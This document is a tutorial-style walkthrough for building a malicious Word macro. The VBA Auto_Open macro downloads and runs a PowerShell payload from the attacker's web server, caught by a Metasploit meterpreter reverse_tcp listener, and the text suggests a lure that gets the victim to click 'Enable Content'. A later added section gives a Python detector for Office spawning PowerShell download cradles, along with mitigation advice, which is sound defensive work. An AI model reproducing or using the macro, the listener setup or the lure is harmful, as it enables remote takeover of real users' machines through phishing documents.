MS Word Macro Exploit

Description:

The following is an article I read on generating an exploit for MS Word and using it to attack a LAN user.

What you will need:
Microsoft Word
The Social-Engineer Toolkit (preinstalled on Kali)
Apache web server (preinstalled on Kali)
The Metasploit Framework (also preinstalled on Kali)

To Resolve:

  1. Create the payload. On Kali, open terminal and type: setoolkit

  2. Type 1, then 9, then 1 to select the PowerShell Alphanumeric Shellcode Injector.

  3. Fill in the LHOST variable with your attacking machine's IP address. This attack assumes you are on the same local subnet as your victim. Then fill in LPORT, the port you want the connection to come back on. People typically keep this at 4444, but you can choose whatever you like. Answer no when asked to start the listener now.

  4. Now move the payload to your web server:

    mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
    service apache2 start
    
  5. Now we setup the listener:

    msfconsole  
    use multi/handler
    
    set PAYLOAD windows/meterpreter/reverse_tcp  
    set LHOST 10.10.10.200  
    set LPORT 4444  
    exploit
    
  6. Now we need to add the command to our MS Word document:

    • Open up a blank MS Word doc and name it something like attack.docm, making sure it is saved in the macro-enabled format.

    • Go to the “View” tab => Macros => “Auto_Open” / attack.docm => Create => (paste in the following:)

    Sub Auto_Open()  
    Dim exec As String  
    exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt'))"""  
    Shell (exec)  
    End Sub  
    Sub AutoOpen()  
    Auto_Open  
    End Sub  
    Sub Workbook_Open()
    
    • At this point you may want to obfuscate the code, but many people don't even know how to get to the macros section of Word, much less what macros even are, so we will skip this step. If you want to know how, read the article in the reference (the source).

    • Save the document

  7. Now we need to convince the victim that the document is safe. The article suggests wording along the lines of "to open the secure document, click 'Enable Content'".
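From the defender's side, the chain described above leaves a distinctive trace: WINWORD.EXE spawning powershell.exe with an IEX / WebClient.DownloadString command line. The following is an added detection example, not code from the original article or from SET or Metasploit. It runs over a few constructed process-creation events in a simplified JSON-lines shape (the field names parent_image, image, command_line and the 192.0.2.x addresses are assumptions for this example); in practice you would map the same logic onto Sysmon Event ID 1 or EDR telemetry.

```python
"""Flag the Office -> PowerShell download cradle in process-creation events.

Added example (not from the original article). Log shape and sample values
are constructed for illustration.
"""
import json
import re

# Office hosts that should almost never spawn a script interpreter
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe",
                   "wscript.exe", "cscript.exe", "mshta.exe"}

# Indicators of the download-and-execute cradle used by the macro on this page
CRADLE_PATTERNS = [
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"net\.webclient|downloadstring|downloadfile", re.I),
    re.compile(r"https?://", re.I),
]


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(evt):
    """Return the list of reasons an event is suspicious (empty if benign)."""
    parent = basename(evt.get("parent_image", ""))
    child = basename(evt.get("image", ""))
    cmd = evt.get("command_line", "")
    reasons = []
    if parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
        reasons.append(f"office_spawns_script:{parent}->{child}")
    # Two or more cradle indicators together is a strong signal on its own
    hits = [p.pattern for p in CRADLE_PATTERNS if p.search(cmd)]
    if len(hits) >= 2:
        reasons.append("download_cradle")
    return reasons


def triage(lines):
    """Parse JSON-lines events and return alerts with a simple severity."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        evt = json.loads(line)
        reasons = score_event(evt)
        if reasons:
            alerts.append({
                "event_id": evt["id"],
                "severity": "high" if len(reasons) > 1 else "medium",
                "reasons": reasons,
            })
    return alerts


# Constructed sample telemetry (raw string so JSON keeps its escaped backslashes)
SAMPLE_LOG = r"""
{"id": 1, "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://192.0.2.10/payload.txt'))\""}
{"id": 2, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe Get-ChildItem C:\\Users"}
{"id": 3, "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c whoami"}
{"id": 4, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe -c IEX ((New-Object Net.WebClient).DownloadString('http://192.0.2.20/tools/setup.ps1'))"}
"""


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG.splitlines()):
        print(alert)
```

Event 1 matches both the parent/child pairing and the cradle pattern and is rated high; events 3 and 4 each trip only one rule and come out medium, which is the tier an analyst would review rather than page on. Blocking macros from Internet-sourced documents and restricting Office child processes (for example via attack surface reduction rules) removes the chain before detection is needed.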

References:

“Create & Obfuscate a Virus Inside of a Microsoft Word Document”
